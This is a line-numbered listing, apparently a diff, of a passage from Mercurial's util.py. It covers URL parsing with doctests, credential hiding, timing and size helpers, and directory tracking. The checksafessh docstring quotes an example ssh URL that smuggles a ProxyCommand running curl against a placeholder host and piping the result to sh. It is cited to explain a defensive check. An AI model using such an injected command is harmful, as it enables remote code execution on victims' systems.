3089 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3097 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3090
3098
3091 Note that for backward compatibility reasons, bundle URLs do not
3099 Note that for backward compatibility reasons, bundle URLs do not
3092 take host names. That means 'bundle://../' has a path of '../'.
3100 take host names. That means 'bundle://../' has a path of '../'.
3093
3101
3094 Examples:
3102 Examples:
3095
3103
3096 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3104 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3097 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3105 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3098 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3106 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3099 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3107 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3100 >>> url(b'file:///home/joe/repo')
3108 >>> url(b'file:///home/joe/repo')
3101 <url scheme: 'file', path: '/home/joe/repo'>
3109 <url scheme: 'file', path: '/home/joe/repo'>
3102 >>> url(b'file:///c:/temp/foo/')
3110 >>> url(b'file:///c:/temp/foo/')
3103 <url scheme: 'file', path: 'c:/temp/foo/'>
3111 <url scheme: 'file', path: 'c:/temp/foo/'>
3104 >>> url(b'bundle:foo')
3112 >>> url(b'bundle:foo')
3105 <url scheme: 'bundle', path: 'foo'>
3113 <url scheme: 'bundle', path: 'foo'>
3106 >>> url(b'bundle://../foo')
3114 >>> url(b'bundle://../foo')
3107 <url scheme: 'bundle', path: '../foo'>
3115 <url scheme: 'bundle', path: '../foo'>
3108 >>> url(br'c:\foo\bar')
3116 >>> url(br'c:\foo\bar')
3109 <url path: 'c:\\foo\\bar'>
3117 <url path: 'c:\\foo\\bar'>
3110 >>> url(br'\\blah\blah\blah')
3118 >>> url(br'\\blah\blah\blah')
3111 <url path: '\\\\blah\\blah\\blah'>
3119 <url path: '\\\\blah\\blah\\blah'>
3112 >>> url(br'\\blah\blah\blah#baz')
3120 >>> url(br'\\blah\blah\blah#baz')
3113 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3121 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3114 >>> url(br'file:///C:\users\me')
3122 >>> url(br'file:///C:\users\me')
3115 <url scheme: 'file', path: 'C:\\users\\me'>
3123 <url scheme: 'file', path: 'C:\\users\\me'>
3116
3124
3117 Authentication credentials:
3125 Authentication credentials:
3118
3126
3119 >>> url(b'ssh://joe:xyz@x/repo')
3127 >>> url(b'ssh://joe:xyz@x/repo')
3120 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3128 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3121 >>> url(b'ssh://joe@x/repo')
3129 >>> url(b'ssh://joe@x/repo')
3122 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3130 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3123
3131
3124 Query strings and fragments:
3132 Query strings and fragments:
3125
3133
3126 >>> url(b'http://host/a?b#c')
3134 >>> url(b'http://host/a?b#c')
3127 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3135 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3128 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3136 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3129 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3137 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3130
3138
3131 Empty path:
3139 Empty path:
3132
3140
3133 >>> url(b'')
3141 >>> url(b'')
3134 <url path: ''>
3142 <url path: ''>
3135 >>> url(b'#a')
3143 >>> url(b'#a')
3136 <url path: '', fragment: 'a'>
3144 <url path: '', fragment: 'a'>
3137 >>> url(b'http://host/')
3145 >>> url(b'http://host/')
3138 <url scheme: 'http', host: 'host', path: ''>
3146 <url scheme: 'http', host: 'host', path: ''>
3139 >>> url(b'http://host/#a')
3147 >>> url(b'http://host/#a')
3140 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3148 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3141
3149
3142 Only scheme:
3150 Only scheme:
3143
3151
3144 >>> url(b'http:')
3152 >>> url(b'http:')
3145 <url scheme: 'http'>
3153 <url scheme: 'http'>
3146 """
3154 """
3147
3155
3148 _safechars = "!~*'()+"
3156 _safechars = "!~*'()+"
3149 _safepchars = "/!~*'()+:\\"
3157 _safepchars = "/!~*'()+:\\"
3150 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3158 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3151
3159
3152 def __init__(self, path, parsequery=True, parsefragment=True):
3160 def __init__(self, path, parsequery=True, parsefragment=True):
3153 # We slowly chomp away at path until we have only the path left
3161 # We slowly chomp away at path until we have only the path left
3154 self.scheme = self.user = self.passwd = self.host = None
3162 self.scheme = self.user = self.passwd = self.host = None
3155 self.port = self.path = self.query = self.fragment = None
3163 self.port = self.path = self.query = self.fragment = None
3156 self._localpath = True
3164 self._localpath = True
3157 self._hostport = ''
3165 self._hostport = ''
3158 self._origpath = path
3166 self._origpath = path
3159
3167
3160 if parsefragment and '#' in path:
3168 if parsefragment and '#' in path:
3161 path, self.fragment = path.split('#', 1)
3169 path, self.fragment = path.split('#', 1)
3162
3170
3163 # special case for Windows drive letters and UNC paths
3171 # special case for Windows drive letters and UNC paths
3164 if hasdriveletter(path) or path.startswith('\\\\'):
3172 if hasdriveletter(path) or path.startswith('\\\\'):
3165 self.path = path
3173 self.path = path
3166 return
3174 return
3167
3175
3168 # For compatibility reasons, we can't handle bundle paths as
3176 # For compatibility reasons, we can't handle bundle paths as
3169 # normal URLS
3177 # normal URLS
3170 if path.startswith('bundle:'):
3178 if path.startswith('bundle:'):
3171 self.scheme = 'bundle'
3179 self.scheme = 'bundle'
3172 path = path[7:]
3180 path = path[7:]
3173 if path.startswith('//'):
3181 if path.startswith('//'):
3174 path = path[2:]
3182 path = path[2:]
3175 self.path = path
3183 self.path = path
3176 return
3184 return
3177
3185
3178 if self._matchscheme(path):
3186 if self._matchscheme(path):
3179 parts = path.split(':', 1)
3187 parts = path.split(':', 1)
3180 if parts[0]:
3188 if parts[0]:
3181 self.scheme, path = parts
3189 self.scheme, path = parts
3182 self._localpath = False
3190 self._localpath = False
3183
3191
3184 if not path:
3192 if not path:
3185 path = None
3193 path = None
3186 if self._localpath:
3194 if self._localpath:
3187 self.path = ''
3195 self.path = ''
3188 return
3196 return
3189 else:
3197 else:
3190 if self._localpath:
3198 if self._localpath:
3191 self.path = path
3199 self.path = path
3192 return
3200 return
3193
3201
3194 if parsequery and '?' in path:
3202 if parsequery and '?' in path:
3195 path, self.query = path.split('?', 1)
3203 path, self.query = path.split('?', 1)
3196 if not path:
3204 if not path:
3197 path = None
3205 path = None
3198 if not self.query:
3206 if not self.query:
3199 self.query = None
3207 self.query = None
3200
3208
3201 # // is required to specify a host/authority
3209 # // is required to specify a host/authority
3202 if path and path.startswith('//'):
3210 if path and path.startswith('//'):
3203 parts = path[2:].split('/', 1)
3211 parts = path[2:].split('/', 1)
3204 if len(parts) > 1:
3212 if len(parts) > 1:
3205 self.host, path = parts
3213 self.host, path = parts
3206 else:
3214 else:
3207 self.host = parts[0]
3215 self.host = parts[0]
3208 path = None
3216 path = None
3209 if not self.host:
3217 if not self.host:
3210 self.host = None
3218 self.host = None
3211 # path of file:///d is /d
3219 # path of file:///d is /d
3212 # path of file:///d:/ is d:/, not /d:/
3220 # path of file:///d:/ is d:/, not /d:/
3213 if path and not hasdriveletter(path):
3221 if path and not hasdriveletter(path):
3214 path = '/' + path
3222 path = '/' + path
3215
3223
3216 if self.host and '@' in self.host:
3224 if self.host and '@' in self.host:
3217 self.user, self.host = self.host.rsplit('@', 1)
3225 self.user, self.host = self.host.rsplit('@', 1)
3218 if ':' in self.user:
3226 if ':' in self.user:
3219 self.user, self.passwd = self.user.split(':', 1)
3227 self.user, self.passwd = self.user.split(':', 1)
3220 if not self.host:
3228 if not self.host:
3221 self.host = None
3229 self.host = None
3222
3230
3223 # Don't split on colons in IPv6 addresses without ports
3231 # Don't split on colons in IPv6 addresses without ports
3224 if (self.host and ':' in self.host and
3232 if (self.host and ':' in self.host and
3225 not (self.host.startswith('[') and self.host.endswith(']'))):
3233 not (self.host.startswith('[') and self.host.endswith(']'))):
3226 self._hostport = self.host
3234 self._hostport = self.host
3227 self.host, self.port = self.host.rsplit(':', 1)
3235 self.host, self.port = self.host.rsplit(':', 1)
3228 if not self.host:
3236 if not self.host:
3229 self.host = None
3237 self.host = None
3230
3238
3231 if (self.host and self.scheme == 'file' and
3239 if (self.host and self.scheme == 'file' and
3232 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3240 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3233 raise Abort(_('file:// URLs can only refer to localhost'))
3241 raise Abort(_('file:// URLs can only refer to localhost'))
3234
3242
3235 self.path = path
3243 self.path = path
3236
3244
3237 # leave the query string escaped
3245 # leave the query string escaped
3238 for a in ('user', 'passwd', 'host', 'port',
3246 for a in ('user', 'passwd', 'host', 'port',
3239 'path', 'fragment'):
3247 'path', 'fragment'):
3240 v = getattr(self, a)
3248 v = getattr(self, a)
3241 if v is not None:
3249 if v is not None:
3242 setattr(self, a, urlreq.unquote(v))
3250 setattr(self, a, urlreq.unquote(v))
3243
3251
3244 @encoding.strmethod
3252 @encoding.strmethod
3245 def __repr__(self):
3253 def __repr__(self):
3246 attrs = []
3254 attrs = []
3247 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3255 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3248 'query', 'fragment'):
3256 'query', 'fragment'):
3249 v = getattr(self, a)
3257 v = getattr(self, a)
3250 if v is not None:
3258 if v is not None:
3251 attrs.append('%s: %r' % (a, v))
3259 attrs.append('%s: %r' % (a, v))
3252 return '<url %s>' % ', '.join(attrs)
3260 return '<url %s>' % ', '.join(attrs)
3253
3261
3254 def __bytes__(self):
3262 def __bytes__(self):
3255 r"""Join the URL's components back into a URL string.
3263 r"""Join the URL's components back into a URL string.
3256
3264
3257 Examples:
3265 Examples:
3258
3266
3259 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3267 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3260 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3268 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3261 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3269 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3262 'http://user:pw@host:80/?foo=bar&baz=42'
3270 'http://user:pw@host:80/?foo=bar&baz=42'
3263 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3271 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3264 'http://user:pw@host:80/?foo=bar%3dbaz'
3272 'http://user:pw@host:80/?foo=bar%3dbaz'
3265 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3273 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3266 'ssh://user:pw@[::1]:2200//home/joe#'
3274 'ssh://user:pw@[::1]:2200//home/joe#'
3267 >>> bytes(url(b'http://localhost:80//'))
3275 >>> bytes(url(b'http://localhost:80//'))
3268 'http://localhost:80//'
3276 'http://localhost:80//'
3269 >>> bytes(url(b'http://localhost:80/'))
3277 >>> bytes(url(b'http://localhost:80/'))
3270 'http://localhost:80/'
3278 'http://localhost:80/'
3271 >>> bytes(url(b'http://localhost:80'))
3279 >>> bytes(url(b'http://localhost:80'))
3272 'http://localhost:80/'
3280 'http://localhost:80/'
3273 >>> bytes(url(b'bundle:foo'))
3281 >>> bytes(url(b'bundle:foo'))
3274 'bundle:foo'
3282 'bundle:foo'
3275 >>> bytes(url(b'bundle://../foo'))
3283 >>> bytes(url(b'bundle://../foo'))
3276 'bundle:../foo'
3284 'bundle:../foo'
3277 >>> bytes(url(b'path'))
3285 >>> bytes(url(b'path'))
3278 'path'
3286 'path'
3279 >>> bytes(url(b'file:///tmp/foo/bar'))
3287 >>> bytes(url(b'file:///tmp/foo/bar'))
3280 'file:///tmp/foo/bar'
3288 'file:///tmp/foo/bar'
3281 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3289 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3282 'file:///c:/tmp/foo/bar'
3290 'file:///c:/tmp/foo/bar'
3283 >>> print(url(br'bundle:foo\bar'))
3291 >>> print(url(br'bundle:foo\bar'))
3284 bundle:foo\bar
3292 bundle:foo\bar
3285 >>> print(url(br'file:///D:\data\hg'))
3293 >>> print(url(br'file:///D:\data\hg'))
3286 file:///D:\data\hg
3294 file:///D:\data\hg
3287 """
3295 """
3288 if self._localpath:
3296 if self._localpath:
3289 s = self.path
3297 s = self.path
3290 if self.scheme == 'bundle':
3298 if self.scheme == 'bundle':
3291 s = 'bundle:' + s
3299 s = 'bundle:' + s
3292 if self.fragment:
3300 if self.fragment:
3293 s += '#' + self.fragment
3301 s += '#' + self.fragment
3294 return s
3302 return s
3295
3303
3296 s = self.scheme + ':'
3304 s = self.scheme + ':'
3297 if self.user or self.passwd or self.host:
3305 if self.user or self.passwd or self.host:
3298 s += '//'
3306 s += '//'
3299 elif self.scheme and (not self.path or self.path.startswith('/')
3307 elif self.scheme and (not self.path or self.path.startswith('/')
3300 or hasdriveletter(self.path)):
3308 or hasdriveletter(self.path)):
3301 s += '//'
3309 s += '//'
3302 if hasdriveletter(self.path):
3310 if hasdriveletter(self.path):
3303 s += '/'
3311 s += '/'
3304 if self.user:
3312 if self.user:
3305 s += urlreq.quote(self.user, safe=self._safechars)
3313 s += urlreq.quote(self.user, safe=self._safechars)
3306 if self.passwd:
3314 if self.passwd:
3307 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3315 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3308 if self.user or self.passwd:
3316 if self.user or self.passwd:
3309 s += '@'
3317 s += '@'
3310 if self.host:
3318 if self.host:
3311 if not (self.host.startswith('[') and self.host.endswith(']')):
3319 if not (self.host.startswith('[') and self.host.endswith(']')):
3312 s += urlreq.quote(self.host)
3320 s += urlreq.quote(self.host)
3313 else:
3321 else:
3314 s += self.host
3322 s += self.host
3315 if self.port:
3323 if self.port:
3316 s += ':' + urlreq.quote(self.port)
3324 s += ':' + urlreq.quote(self.port)
3317 if self.host:
3325 if self.host:
3318 s += '/'
3326 s += '/'
3319 if self.path:
3327 if self.path:
3320 # TODO: similar to the query string, we should not unescape the
3328 # TODO: similar to the query string, we should not unescape the
3321 # path when we store it, the path might contain '%2f' = '/',
3329 # path when we store it, the path might contain '%2f' = '/',
3322 # which we should *not* escape.
3330 # which we should *not* escape.
3323 s += urlreq.quote(self.path, safe=self._safepchars)
3331 s += urlreq.quote(self.path, safe=self._safepchars)
3324 if self.query:
3332 if self.query:
3325 # we store the query in escaped form.
3333 # we store the query in escaped form.
3326 s += '?' + self.query
3334 s += '?' + self.query
3327 if self.fragment is not None:
3335 if self.fragment is not None:
3328 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3336 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3329 return s
3337 return s
3330
3338
3331 __str__ = encoding.strmethod(__bytes__)
3339 __str__ = encoding.strmethod(__bytes__)
3332
3340
3333 def authinfo(self):
3341 def authinfo(self):
3334 user, passwd = self.user, self.passwd
3342 user, passwd = self.user, self.passwd
3335 try:
3343 try:
3336 self.user, self.passwd = None, None
3344 self.user, self.passwd = None, None
3337 s = bytes(self)
3345 s = bytes(self)
3338 finally:
3346 finally:
3339 self.user, self.passwd = user, passwd
3347 self.user, self.passwd = user, passwd
3340 if not self.user:
3348 if not self.user:
3341 return (s, None)
3349 return (s, None)
3342 # authinfo[1] is passed to urllib2 password manager, and its
3350 # authinfo[1] is passed to urllib2 password manager, and its
3343 # URIs must not contain credentials. The host is passed in the
3351 # URIs must not contain credentials. The host is passed in the
3344 # URIs list because Python < 2.4.3 uses only that to search for
3352 # URIs list because Python < 2.4.3 uses only that to search for
3345 # a password.
3353 # a password.
3346 return (s, (None, (s, self.host),
3354 return (s, (None, (s, self.host),
3347 self.user, self.passwd or ''))
3355 self.user, self.passwd or ''))
3348
3356
3349 def isabs(self):
3357 def isabs(self):
3350 if self.scheme and self.scheme != 'file':
3358 if self.scheme and self.scheme != 'file':
3351 return True # remote URL
3359 return True # remote URL
3352 if hasdriveletter(self.path):
3360 if hasdriveletter(self.path):
3353 return True # absolute for our purposes - can't be joined()
3361 return True # absolute for our purposes - can't be joined()
3354 if self.path.startswith(br'\\'):
3362 if self.path.startswith(br'\\'):
3355 return True # Windows UNC path
3363 return True # Windows UNC path
3356 if self.path.startswith('/'):
3364 if self.path.startswith('/'):
3357 return True # POSIX-style
3365 return True # POSIX-style
3358 return False
3366 return False
3359
3367
3360 def localpath(self):
3368 def localpath(self):
3361 if self.scheme == 'file' or self.scheme == 'bundle':
3369 if self.scheme == 'file' or self.scheme == 'bundle':
3362 path = self.path or '/'
3370 path = self.path or '/'
3363 # For Windows, we need to promote hosts containing drive
3371 # For Windows, we need to promote hosts containing drive
3364 # letters to paths with drive letters.
3372 # letters to paths with drive letters.
3365 if hasdriveletter(self._hostport):
3373 if hasdriveletter(self._hostport):
3366 path = self._hostport + '/' + self.path
3374 path = self._hostport + '/' + self.path
3367 elif (self.host is not None and self.path
3375 elif (self.host is not None and self.path
3368 and not hasdriveletter(path)):
3376 and not hasdriveletter(path)):
3369 path = '/' + path
3377 path = '/' + path
3370 return path
3378 return path
3371 return self._origpath
3379 return self._origpath
3372
3380
3373 def islocal(self):
3381 def islocal(self):
3374 '''whether localpath will return something that posixfile can open'''
3382 '''whether localpath will return something that posixfile can open'''
3375 return (not self.scheme or self.scheme == 'file'
3383 return (not self.scheme or self.scheme == 'file'
3376 or self.scheme == 'bundle')
3384 or self.scheme == 'bundle')
3377
3385
3378 def hasscheme(path):
3386 def hasscheme(path):
3379 return bool(url(path).scheme)
3387 return bool(url(path).scheme)
3380
3388
3381 def hasdriveletter(path):
3389 def hasdriveletter(path):
3382 return path and path[1:2] == ':' and path[0:1].isalpha()
3390 return path and path[1:2] == ':' and path[0:1].isalpha()
3383
3391
3384 def urllocalpath(path):
3392 def urllocalpath(path):
3385 return url(path, parsequery=False, parsefragment=False).localpath()
3393 return url(path, parsequery=False, parsefragment=False).localpath()
3386
3394
3387 def checksafessh(path):
3395 def checksafessh(path):
3388 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3396 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3389
3397
3390 This is a sanity check for ssh urls. ssh will parse the first item as
3398 This is a sanity check for ssh urls. ssh will parse the first item as
3391 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3399 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3392 Let's prevent these potentially exploited urls entirely and warn the
3400 Let's prevent these potentially exploited urls entirely and warn the
3393 user.
3401 user.
3394
3402
3395 Raises an error.Abort when the url is unsafe.
3403 Raises an error.Abort when the url is unsafe.
3396 """
3404 """
3397 path = urlreq.unquote(path)
3405 path = urlreq.unquote(path)
3398 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3406 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3399 raise error.Abort(_('potentially unsafe url: %r') %
3407 raise error.Abort(_('potentially unsafe url: %r') %
3400 (pycompat.bytestr(path),))
3408 (pycompat.bytestr(path),))
3401
3409
3402 def hidepassword(u):
3410 def hidepassword(u):
3403 '''hide user credential in a url string'''
3411 '''hide user credential in a url string'''
3404 u = url(u)
3412 u = url(u)
3405 if u.passwd:
3413 if u.passwd:
3406 u.passwd = '***'
3414 u.passwd = '***'
3407 return bytes(u)
3415 return bytes(u)
3408
3416
3409 def removeauth(u):
3417 def removeauth(u):
3410 '''remove all authentication information from a url string'''
3418 '''remove all authentication information from a url string'''
3411 u = url(u)
3419 u = url(u)
3412 u.user = u.passwd = None
3420 u.user = u.passwd = None
3413 return str(u)
3421 return str(u)
3414
3422
3415 timecount = unitcountfn(
3423 timecount = unitcountfn(
3416 (1, 1e3, _('%.0f s')),
3424 (1, 1e3, _('%.0f s')),
3417 (100, 1, _('%.1f s')),
3425 (100, 1, _('%.1f s')),
3418 (10, 1, _('%.2f s')),
3426 (10, 1, _('%.2f s')),
3419 (1, 1, _('%.3f s')),
3427 (1, 1, _('%.3f s')),
3420 (100, 0.001, _('%.1f ms')),
3428 (100, 0.001, _('%.1f ms')),
3421 (10, 0.001, _('%.2f ms')),
3429 (10, 0.001, _('%.2f ms')),
3422 (1, 0.001, _('%.3f ms')),
3430 (1, 0.001, _('%.3f ms')),
3423 (100, 0.000001, _('%.1f us')),
3431 (100, 0.000001, _('%.1f us')),
3424 (10, 0.000001, _('%.2f us')),
3432 (10, 0.000001, _('%.2f us')),
3425 (1, 0.000001, _('%.3f us')),
3433 (1, 0.000001, _('%.3f us')),
3426 (100, 0.000000001, _('%.1f ns')),
3434 (100, 0.000000001, _('%.1f ns')),
3427 (10, 0.000000001, _('%.2f ns')),
3435 (10, 0.000000001, _('%.2f ns')),
3428 (1, 0.000000001, _('%.3f ns')),
3436 (1, 0.000000001, _('%.3f ns')),
3429 )
3437 )
3430
3438
3431 _timenesting = [0]
3439 _timenesting = [0]
3432
3440
3433 def timed(func):
3441 def timed(func):
3434 '''Report the execution time of a function call to stderr.
3442 '''Report the execution time of a function call to stderr.
3435
3443
3436 During development, use as a decorator when you need to measure
3444 During development, use as a decorator when you need to measure
3437 the cost of a function, e.g. as follows:
3445 the cost of a function, e.g. as follows:
3438
3446
3439 @util.timed
3447 @util.timed
3440 def foo(a, b, c):
3448 def foo(a, b, c):
3441 pass
3449 pass
3442 '''
3450 '''
3443
3451
3444 def wrapper(*args, **kwargs):
3452 def wrapper(*args, **kwargs):
3445 start = timer()
3453 start = timer()
3446 indent = 2
3454 indent = 2
3447 _timenesting[0] += indent
3455 _timenesting[0] += indent
3448 try:
3456 try:
3449 return func(*args, **kwargs)
3457 return func(*args, **kwargs)
3450 finally:
3458 finally:
3451 elapsed = timer() - start
3459 elapsed = timer() - start
3452 _timenesting[0] -= indent
3460 _timenesting[0] -= indent
3453 stderr.write('%s%s: %s\n' %
3461 stderr.write('%s%s: %s\n' %
3454 (' ' * _timenesting[0], func.__name__,
3462 (' ' * _timenesting[0], func.__name__,
3455 timecount(elapsed)))
3463 timecount(elapsed)))
3456 return wrapper
3464 return wrapper
3457
3465
3458 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3466 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3459 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3467 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3460
3468
3461 def sizetoint(s):
3469 def sizetoint(s):
3462 '''Convert a space specifier to a byte count.
3470 '''Convert a space specifier to a byte count.
3463
3471
3464 >>> sizetoint(b'30')
3472 >>> sizetoint(b'30')
3465 30
3473 30
3466 >>> sizetoint(b'2.2kb')
3474 >>> sizetoint(b'2.2kb')
3467 2252
3475 2252
3468 >>> sizetoint(b'6M')
3476 >>> sizetoint(b'6M')
3469 6291456
3477 6291456
3470 '''
3478 '''
3471 t = s.strip().lower()
3479 t = s.strip().lower()
3472 try:
3480 try:
3473 for k, u in _sizeunits:
3481 for k, u in _sizeunits:
3474 if t.endswith(k):
3482 if t.endswith(k):
3475 return int(float(t[:-len(k)]) * u)
3483 return int(float(t[:-len(k)]) * u)
3476 return int(t)
3484 return int(t)
3477 except ValueError:
3485 except ValueError:
3478 raise error.ParseError(_("couldn't parse size: %s") % s)
3486 raise error.ParseError(_("couldn't parse size: %s") % s)
3479
3487
3480 class hooks(object):
3488 class hooks(object):
3481 '''A collection of hook functions that can be used to extend a
3489 '''A collection of hook functions that can be used to extend a
3482 function's behavior. Hooks are called in lexicographic order,
3490 function's behavior. Hooks are called in lexicographic order,
3483 based on the names of their sources.'''
3491 based on the names of their sources.'''
3484
3492
3485 def __init__(self):
3493 def __init__(self):
3486 self._hooks = []
3494 self._hooks = []
3487
3495
3488 def add(self, source, hook):
3496 def add(self, source, hook):
3489 self._hooks.append((source, hook))
3497 self._hooks.append((source, hook))
3490
3498
3491 def __call__(self, *args):
3499 def __call__(self, *args):
3492 self._hooks.sort(key=lambda x: x[0])
3500 self._hooks.sort(key=lambda x: x[0])
3493 results = []
3501 results = []
3494 for source, hook in self._hooks:
3502 for source, hook in self._hooks:
3495 results.append(hook(*args))
3503 results.append(hook(*args))
3496 return results
3504 return results
3497
3505
3498 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3506 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3499 '''Yields lines for a nicely formatted stacktrace.
3507 '''Yields lines for a nicely formatted stacktrace.
3500 Skips the 'skip' last entries, then return the last 'depth' entries.
3508 Skips the 'skip' last entries, then return the last 'depth' entries.
3501 Each file+linenumber is formatted according to fileline.
3509 Each file+linenumber is formatted according to fileline.
3502 Each line is formatted according to line.
3510 Each line is formatted according to line.
3503 If line is None, it yields:
3511 If line is None, it yields:
3504 length of longest filepath+line number,
3512 length of longest filepath+line number,
3505 filepath+linenumber,
3513 filepath+linenumber,
3506 function
3514 function
3507
3515
3508 Not be used in production code but very convenient while developing.
3516 Not be used in production code but very convenient while developing.
3509 '''
3517 '''
3510 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3518 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3511 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3519 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3512 ][-depth:]
3520 ][-depth:]
3513 if entries:
3521 if entries:
3514 fnmax = max(len(entry[0]) for entry in entries)
3522 fnmax = max(len(entry[0]) for entry in entries)
3515 for fnln, func in entries:
3523 for fnln, func in entries:
3516 if line is None:
3524 if line is None:
3517 yield (fnmax, fnln, func)
3525 yield (fnmax, fnln, func)
3518 else:
3526 else:
3519 yield line % (fnmax, fnln, func)
3527 yield line % (fnmax, fnln, func)
3520
3528
3521 def debugstacktrace(msg='stacktrace', skip=0,
3529 def debugstacktrace(msg='stacktrace', skip=0,
3522 f=stderr, otherf=stdout, depth=0):
3530 f=stderr, otherf=stdout, depth=0):
3523 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3531 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3524 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3532 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3525 By default it will flush stdout first.
3533 By default it will flush stdout first.
3526 It can be used everywhere and intentionally does not require an ui object.
3534 It can be used everywhere and intentionally does not require an ui object.
3527 Not be used in production code but very convenient while developing.
3535 Not be used in production code but very convenient while developing.
3528 '''
3536 '''
3529 if otherf:
3537 if otherf:
3530 otherf.flush()
3538 otherf.flush()
3531 f.write('%s at:\n' % msg.rstrip())
3539 f.write('%s at:\n' % msg.rstrip())
3532 for line in getstackframes(skip + 1, depth=depth):
3540 for line in getstackframes(skip + 1, depth=depth):
3533 f.write(line)
3541 f.write(line)
3534 f.flush()
3542 f.flush()
3535
3543
3536 class dirs(object):
3544 class dirs(object):
3537 '''a multiset of directory names from a dirstate or manifest'''
3545 '''a multiset of directory names from a dirstate or manifest'''
3538
3546
3539 def __init__(self, map, skip=None):
3547 def __init__(self, map, skip=None):
3540 self._dirs = {}
3548 self._dirs = {}
3541 addpath = self.addpath
3549 addpath = self.addpath
3542 if safehasattr(map, 'iteritems') and skip is not None:
3550 if safehasattr(map, 'iteritems') and skip is not None:
3543 for f, s in map.iteritems():
3551 for f, s in map.iteritems():
3544 if s[0] != skip:
3552 if s[0] != skip:
3545 addpath(f)
3553 addpath(f)
3546 else:
3554 else:
3547 for f in map:
3555 for f in map:
3548 addpath(f)
3556 addpath(f)
3549
3557
3550 def addpath(self, path):
3558 def addpath(self, path):
3551 dirs = self._dirs
3559 dirs = self._dirs
3552 for base in finddirs(path):
3560 for base in finddirs(path):
3553 if base in dirs:
3561 if base in dirs:
3554 dirs[base] += 1
3562 dirs[base] += 1
3555 return
3563 return
3556 dirs[base] = 1
3564 dirs[base] = 1
3557
3565
3558 def delpath(self, path):
3566 def delpath(self, path):
3559 dirs = self._dirs
3567 dirs = self._dirs
3560 for base in finddirs(path):
3568 for base in finddirs(path):
3561 if dirs[base] > 1:
3569 if dirs[base] > 1:
3562 dirs[base] -= 1
3570 dirs[base] -= 1
3563 return
3571 return
3564 del dirs[base]
3572 del dirs[base]
3565
3573
3566 def __iter__(self):
3574 def __iter__(self):
3567 return iter(self._dirs)
3575 return iter(self._dirs)
3568
3576
3569 def __contains__(self, d):
3577 def __contains__(self, d):
3570 return d in self._dirs
3578 return d in self._dirs
3571
3579
3572 if safehasattr(parsers, 'dirs'):
3580 if safehasattr(parsers, 'dirs'):
3573 dirs = parsers.dirs
3581 dirs = parsers.dirs
3574
3582
3575 def finddirs(path):
3583 def finddirs(path):
3576 pos = path.rfind('/')
3584 pos = path.rfind('/')
3577 while pos != -1:
3585 while pos != -1:
3578 yield path[:pos]
3586 yield path[:pos]
